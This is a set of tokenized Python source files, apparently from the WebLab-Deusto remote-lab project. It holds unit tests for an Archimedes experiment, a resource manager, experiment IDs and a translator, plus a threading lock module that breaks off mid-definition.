<s> from __future__ import print_function , unicode_literals <EOL> import base64 <EOL> import json <EOL> import unittest <EOL> import threading <EOL> import time <EOL> from mock import patch , PropertyMock , MagicMock <EOL> from experiments . archimedes import Archimedes <EOL> from voodoo . configuration import ConfigurationManager <EOL> from voodoo . sessions . session_id import SessionId <EOL> class TestArchimedes ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . cfg_manager = ConfigurationManager ( ) <EOL> self . cfg_manager . _set_value ( "<STR_LIT>" , False ) <EOL> self . cfg_manager . _set_value ( "<STR_LIT>" , { "<STR_LIT:default>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . experiment = Archimedes ( None , None , self . cfg_manager ) <EOL> self . lab_session_id = SessionId ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> self . experiment . do_dispose ( ) <EOL> def test_start ( self ) : <EOL> m = MagicMock ( return_value = "<STR_LIT>" ) <EOL> self . experiment . _send = m <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> assert m . mock_calls [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] == "<STR_LIT>" <EOL> assert m . mock_calls [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] == "<STR_LIT>" <EOL> def test_unknown_instance ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cfg_manager = ConfigurationManager ( ) <EOL> self . cfg_manager . _set_value ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . experiment = Archimedes ( None , None , self . cfg_manager ) <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert up_resp . startswith ( "<STR_LIT>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert up_resp . startswith ( "<STR_LIT>" ) <EOL> def test_control_ball_commands ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> down_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> slow_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> def test_basic_data_commands ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> level_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( level_resp ) == <NUM_LIT> <EOL> load_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( load_resp ) == <NUM_LIT> <EOL> def test_advanced_data_commands ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> image_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> dec = base64 . b64decode ( image_resp ) <EOL> assert len ( dec ) > <NUM_LIT:100> <EOL> plot_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> f = file ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" % ( image_resp ) <EOL> ) <EOL> f . close ( ) <EOL> def test_explicit_instance_commands ( self ) : <EOL> """<STR_LIT>""" <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> down_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> slow_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> level_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( level_resp ) == <NUM_LIT> <EOL> load_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( load_resp ) == <NUM_LIT> <EOL> def test_allinfo_command ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> r = json . loads ( resp ) <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> def test_allinfo_command_multiple ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> r = json . loads ( resp ) <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> def suite ( ) : <EOL> return unittest . TestSuite ( <EOL> ( <EOL> unittest . makeSuite ( TestArchimedes ) <EOL> ) <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import unittest <EOL> import test . unit . configuration as configuration_module <EOL> import voodoo . configuration as ConfigurationManager <EOL> from weblab . data . experiments import ExperimentInstanceId <EOL> from weblab . data . experiments import ExperimentId <EOL> from weblab . core . coordinator . resource import Resource <EOL> from weblab . core . coordinator . sql . coordinator import Coordinator <EOL> import weblab . core . coordinator . sql . resource_manager as ResourcesManager <EOL> import weblab . core . coordinator . sql . db as CoordinationDatabaseManager <EOL> import weblab . core . coordinator . sql . model as CoordinatorModel <EOL> import weblab . core . coordinator . exc as CoordExc <EOL> class ResourcesManagerTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . cfg_manager = ConfigurationManager . ConfigurationManager ( ) <EOL> self . cfg_manager . append_module ( configuration_module ) <EOL> self . coordinator = Coordinator ( None , self . cfg_manager ) <EOL> self . coordinator . _clean ( ) <EOL> self . coordinator . stop ( ) <EOL> coordination_database = CoordinationDatabaseManager . CoordinationDatabaseManager ( self . cfg_manager ) <EOL> self . session_maker = coordination_database . session_maker <EOL> self . resources_manager = ResourcesManager . ResourcesManager ( self . session_maker ) <EOL> self . resources_manager . _clean ( ) <EOL> def test_add_resource ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> resource_types = session . query ( CoordinatorModel . ResourceType ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( resource_types ) , "<STR_LIT>" ) <EOL> self . resources_manager . add_resource ( session , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> self . _check_resource_added ( session ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> session = self . session_maker ( ) <EOL> try : <EOL> self . resources_manager . add_resource ( session , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> self . _check_resource_added ( session ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> def _check_resource_added ( self , session ) : <EOL> resource_types = session . query ( CoordinatorModel . ResourceType ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( resource_types ) ) <EOL> resource_type = resource_types [ <NUM_LIT:0> ] <EOL> self . assertEquals ( "<STR_LIT:type>" , resource_type . name ) <EOL> resource_instances = resource_type . instances <EOL> self . assertEquals ( <NUM_LIT:1> , len ( resource_instances ) ) <EOL> resource_instance = resource_instances [ <NUM_LIT:0> ] <EOL> self . assertEquals ( "<STR_LIT>" , resource_instance . name ) <EOL> self . assertEquals ( resource_type , resource_instance . resource_type ) <EOL> slot = resource_instance . slot <EOL> self . assertNotEquals ( None , slot ) <EOL> self . assertEquals ( resource_instance , slot . resource_instance ) <EOL> def test_add_experiment_instance_id ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> resource_types = session . query ( CoordinatorModel . ResourceType ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( resource_types ) , "<STR_LIT>" ) <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session = self . session_maker ( ) <EOL> try : <EOL> self . _check_resource_added ( session ) <EOL> self . _check_experiment_instance_id_added ( session ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> def test_add_experiment_instance_id_redundant ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> resource_types = session . query ( CoordinatorModel . ResourceType ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( resource_types ) , "<STR_LIT>" ) <EOL> finally : <EOL> session . close ( ) <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session = self . session_maker ( ) <EOL> try : <EOL> self . _check_resource_added ( session ) <EOL> self . _check_experiment_instance_id_added ( session ) <EOL> self . assertRaises ( CoordExc . InvalidExperimentConfigError , <EOL> self . resources_manager . add_experiment_instance_id , <EOL> "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> self . assertRaises ( CoordExc . InvalidExperimentConfigError , <EOL> self . resources_manager . add_experiment_instance_id , <EOL> "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> def test_get_resource_instance_by_experiment_instance_id ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> resource = self . resources_manager . get_resource_instance_by_experiment_instance_id ( exp_id ) <EOL> expected_resource = Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> self . assertEquals ( expected_resource , resource ) <EOL> def test_get_resource_instance_by_experiment_instance_id_failing ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> exp_invalid_type = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertRaises ( CoordExc . ExperimentNotFoundError , <EOL> self . resources_manager . get_resource_instance_by_experiment_instance_id , <EOL> exp_invalid_type ) <EOL> exp_invalid_inst = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertRaises ( CoordExc . ExperimentNotFoundError , <EOL> self . resources_manager . get_resource_instance_by_experiment_instance_id , <EOL> exp_invalid_inst ) <EOL> def test_get_resource_types_by_experiment_id ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> exp_type_id = ExperimentId ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_types = self . resources_manager . get_resource_types_by_experiment_id ( exp_type_id ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( resource_types ) ) <EOL> self . assertTrue ( u"<STR_LIT:type>" in resource_types ) <EOL> def test_get_resource_types_by_experiment_id_error ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> self . assertRaises ( <EOL> CoordExc . ExperimentNotFoundError , <EOL> self . resources_manager . get_resource_types_by_experiment_id , <EOL> ExperimentId ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> ) <EOL> def _check_experiment_instance_id_added ( self , session ) : <EOL> experiment_types = session . query ( CoordinatorModel . ExperimentType ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( experiment_types ) ) <EOL> experiment_type = experiment_types [ <NUM_LIT:0> ] <EOL> self . assertEquals ( "<STR_LIT>" , experiment_type . cat_name ) <EOL> self . assertEquals ( "<STR_LIT>" , experiment_type . exp_name ) <EOL> experiment_instances = experiment_type . instances <EOL> self . assertEquals ( <NUM_LIT:1> , len ( experiment_instances ) ) <EOL> experiment_instance = experiment_instances [ <NUM_LIT:0> ] <EOL> self . assertEquals ( "<STR_LIT>" , experiment_instance . experiment_instance_id ) <EOL> self . assertEquals ( experiment_type , experiment_instance . experiment_type ) <EOL> resource_instance = experiment_instance . resource_instance <EOL> self . assertEquals ( "<STR_LIT>" , resource_instance . name ) <EOL> resource_type = resource_instance . resource_type <EOL> self . assertTrue ( resource_type in experiment_type . resource_types ) <EOL> self . assertTrue ( experiment_type in resource_type . experiment_types ) <EOL> def test_remove_resource_instance_id ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) ) <EOL> experiment_instances = session . query ( CoordinatorModel . ExperimentInstance ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( experiment_instances ) ) <EOL> self . resources_manager . remove_resource_instance_id ( session , exp_id ) <EOL> experiment_instances = session . query ( CoordinatorModel . ExperimentInstance ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( experiment_instances ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> def test_remove_resource_instance ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance = Resource ( "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id , resource_instance ) <EOL> experiment_instances = session . query ( CoordinatorModel . ExperimentInstance ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( experiment_instances ) ) <EOL> resource_instances = session . query ( CoordinatorModel . ResourceInstance ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( resource_instances ) ) <EOL> self . resources_manager . remove_resource_instance ( session , resource_instance ) <EOL> resource_instances = session . query ( CoordinatorModel . ResourceInstance ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( resource_instances ) ) <EOL> experiment_instances = session . query ( CoordinatorModel . ExperimentInstance ) . all ( ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( experiment_instances ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> def test_list_resources ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id1 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance1 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id1 , resource_instance1 ) <EOL> exp_id2 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance2 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id2 , resource_instance2 ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> resources = self . resources_manager . list_resources ( ) <EOL> self . assertEquals ( <NUM_LIT:2> , len ( resources ) ) <EOL> self . assertTrue ( '<STR_LIT>' in resources ) <EOL> self . assertTrue ( '<STR_LIT>' in resources ) <EOL> def test_list_experiments ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id1 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance1 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id1 , resource_instance1 ) <EOL> exp_id2 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance2 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id2 , resource_instance2 ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> resources = self . resources_manager . list_experiments ( ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( resources ) ) <EOL> self . assertTrue ( ExperimentId ( '<STR_LIT>' , '<STR_LIT>' ) in resources ) <EOL> def test_list_experiment_instance_ids_by_resource ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id1 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance1 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id1 , resource_instance1 ) <EOL> exp_id2 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id2 , resource_instance1 ) <EOL> exp_id3 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance2 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id3 , resource_instance2 ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> experiment_instance_ids = self . resources_manager . list_experiment_instance_ids_by_resource ( resource_instance1 ) <EOL> self . assertEquals ( <NUM_LIT:2> , len ( experiment_instance_ids ) ) <EOL> self . assertTrue ( ExperimentInstanceId ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) in experiment_instance_ids ) <EOL> self . assertTrue ( ExperimentInstanceId ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) in experiment_instance_ids ) <EOL> def test_list_laboratories_addresses ( self ) : <EOL> session = self . session_maker ( ) <EOL> try : <EOL> exp_id1 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance1 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id1 , resource_instance1 ) <EOL> exp_id2 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance2 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id2 , resource_instance2 ) <EOL> exp_id3 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> resource_instance3 = Resource ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_id3 , resource_instance3 ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> addresses = self . resources_manager . list_laboratories_addresses ( ) <EOL> self . assertEquals ( <NUM_LIT:2> , len ( addresses ) ) <EOL> self . assertTrue ( "<STR_LIT>" in addresses ) <EOL> self . assertEquals ( <NUM_LIT:2> , len ( addresses [ "<STR_LIT>" ] ) ) <EOL> self . assertTrue ( exp_id1 in addresses [ "<STR_LIT>" ] ) <EOL> self . assertTrue ( exp_id2 in addresses [ "<STR_LIT>" ] ) <EOL> self . assertTrue ( "<STR_LIT>" in addresses ) <EOL> self . assertEquals ( <NUM_LIT:1> , len ( addresses [ "<STR_LIT>" ] ) ) <EOL> self . assertTrue ( exp_id3 in addresses [ "<STR_LIT>" ] ) <EOL> self . assertEquals ( resource_instance1 , addresses [ "<STR_LIT>" ] [ exp_id1 ] ) <EOL> self . assertEquals ( resource_instance2 , addresses [ "<STR_LIT>" ] [ exp_id2 ] ) <EOL> self . assertEquals ( resource_instance3 , addresses [ "<STR_LIT>" ] [ exp_id3 ] ) <EOL> def test_scheduler_reservation_associations ( self ) : <EOL> exp_inst_id1 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> exp_inst_id1b = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> exp_inst_id2 = ExperimentInstanceId ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> exp_id1 = exp_inst_id1 . to_experiment_id ( ) <EOL> exp_id2 = exp_inst_id2 . to_experiment_id ( ) <EOL> session = self . session_maker ( ) <EOL> try : <EOL> self . resources_manager . add_resource ( session , Resource ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . resources_manager . add_resource ( session , Resource ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . resources_manager . add_resource ( session , Resource ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> session . commit ( ) <EOL> finally : <EOL> session . close ( ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_inst_id1 , Resource ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_inst_id1b , Resource ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . resources_manager . add_experiment_instance_id ( "<STR_LIT>" , exp_inst_id2 , Resource ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> reservation1 = '<STR_LIT>' <EOL> reservation2 = '<STR_LIT>' <EOL> self . resources_manager . associate_scheduler_to_reservation ( reservation1 , exp_id1 , '<STR_LIT>' ) <EOL> self . resources_manager . associate_scheduler_to_reservation ( reservation1 , exp_id1 , '<STR_LIT>' ) <EOL> self . resources_manager . associate_scheduler_to_reservation ( reservation2 , exp_id2 , '<STR_LIT>' ) <EOL> resource_type_names = self . resources_manager . retrieve_schedulers_per_reservation ( reservation1 , exp_id1 ) <EOL> self . assertEquals ( set ( ( '<STR_LIT>' , '<STR_LIT>' ) ) , set ( resource_type_names ) ) <EOL> resource_type_names = self . resources_manager . retrieve_schedulers_per_reservation ( reservation2 , exp_id2 ) <EOL> self . assertEquals ( [ '<STR_LIT>' ] , list ( resource_type_names ) ) <EOL> self . resources_manager . dissociate_scheduler_from_reservation ( reservation1 , exp_id1 , '<STR_LIT>' ) <EOL> resource_type_names = self . resources_manager . retrieve_schedulers_per_reservation ( reservation1 , exp_id1 ) <EOL> self . assertEquals ( [ '<STR_LIT>' ] , list ( resource_type_names ) ) <EOL> self . resources_manager . clean_associations_for_reservation ( reservation1 , exp_id1 ) <EOL> resource_type_names = self . resources_manager . retrieve_schedulers_per_reservation ( reservation1 , exp_id1 ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( resource_type_names ) ) <EOL> def suite ( ) : <EOL> return unittest . makeSuite ( ResourcesManagerTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import unittest <EOL> from weblab . data . experiments import ExperimentId , ExperimentInstanceId <EOL> class ExperimentIdsTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . experiment_id = ExperimentId ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . experiment_instance_id = ExperimentInstanceId ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _check_repr ( self , obj ) : <EOL> self . assertEquals ( repr ( obj ) , repr ( eval ( repr ( obj ) ) ) ) <EOL> def test_experiment_id ( self ) : <EOL> self . _check_repr ( self . experiment_id ) <EOL> def test_experiment_instance_id ( self ) : <EOL> self . _check_repr ( self . experiment_instance_id ) <EOL> def suite ( ) : <EOL> return unittest . makeSuite ( ExperimentIdsTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> from weblab . translator . translators import StoresEverythingTranslator <EOL> import test . unit . configuration as configuration_module <EOL> import unittest <EOL> import voodoo . configuration as ConfigurationManager <EOL> class StoresEverythingTranslatorTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _cfg_manager = ConfigurationManager . ConfigurationManager ( ) <EOL> self . _cfg_manager . append_module ( configuration_module ) <EOL> self . translator = StoresEverythingTranslator ( None , None , self . _cfg_manager ) <EOL> def test ( self ) : <EOL> self . assertEquals ( <EOL> None , <EOL> self . translator . do_on_start ( '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT>' , <EOL> self . translator . do_before_send_command ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT>' , <EOL> self . translator . do_after_send_command ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT:file>' , <EOL> self . translator . do_before_send_file ( '<STR_LIT>' , '<STR_LIT:file>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> '<STR_LIT>' , <EOL> self . translator . do_after_send_file ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertEquals ( <EOL> None , <EOL> self . translator . do_on_finish ( '<STR_LIT>' ) <EOL> ) <EOL> def suite ( ) : <EOL> return unittest . makeSuite ( StoresEverythingTranslatorTestCase ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> import threading <EOL> import time <EOL> NUM = <NUM_LIT:0> <EOL> def locked ( lock_name = '<STR_LIT>' ) : <EOL> def locked_with_name ( func ) : <EOL> def wrapped_locked ( self , * args , ** kargs ) : <EOL> the_lock = getattr ( self , lock_name ) <EOL> the_lock . acquire ( ) <EOL> try : <EOL> return func ( self , * args , ** kargs ) <EOL> finally : <EOL> the_lock . release ( ) <EOL> wrapped_locked . __name__ = func . __name__ <EOL> wrapped_locked . __doc__ = func . __doc__ <EOL> return wrapped_locked <EOL> return locked_with_name <EOL> class UnfairLock ( object ) : <EOL> SLICE = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> self . _lock = threading . Lock ( ) <EOL> def acquire ( self ) : <EOL> while True : <EOL> acquired = self . _lock . acquire ( False ) <EOL> if acquired : <EOL> return <EOL> time . sleep ( self . SLICE ) <EOL> def release ( self ) : <EOL> self . _lock . release ( ) <EOL> class _InternalReadLock ( object ) : <EOL> def __init__ ( self , rwlock ) : <EOL> self . rwlock = rwlock <EOL> def acquire ( self ) : <EOL> self . rwlock . _acquire_reading ( ) <EOL> def release ( self ) : <EOL> self . rwlock . _release_reading ( ) <EOL> class _InternalWriteLock ( object ) : <EOL> def __init__ ( self , rwlock ) : <EOL> self . rwlock = rwlock <EOL> def acquire ( self ) : <EOL> self . rwlock . _acquire_writing ( ) <EOL> def release ( self ) : <EOL> self . rwlock . _release_writing ( ) <EOL> class RWLock ( object ) : <EOL> _SHORT_TIME = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> self . _lock = threading . RLock ( ) <EOL> self . _read_lock = _InternalReadLock ( self ) <EOL> self . _write_lock = _InternalWriteLock ( self ) <EOL> self . _condition = threading . Condition ( ) <EOL> self . _reading = <NUM_LIT:0> <EOL> self . _writing = None <EOL> @ locked ( ) <EOL> def _get_reading ( self ) : <EOL> return self . _reading <EOL> @ locked ( ) <EOL> def _increment_reading ( self ) : <EOL> self . _reading += <NUM_LIT:1> <EOL> @ locked ( ) <EOL> def _decrement_reading ( self ) : <EOL> self . _reading -= <NUM_LIT:1> <EOL> @ locked ( ) <EOL> def _set_writing ( self ) : <EOL> self . _writing = [ threading . currentThread ( ) , <NUM_LIT:1> ] <EOL> @ locked ( ) <EOL> def _decrement_writing ( self ) : <EOL> self . _writing [ <NUM_LIT:1> ] = self . _writing [ <NUM_LIT:1> ] - <NUM_LIT:1> <EOL> if self . _writing [ <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> self . _writing = None <EOL> @ locked ( ) <EOL> def _is_writing ( self ) : <EOL> return self . _writing != None <EOL> @ locked ( ) <EOL> def 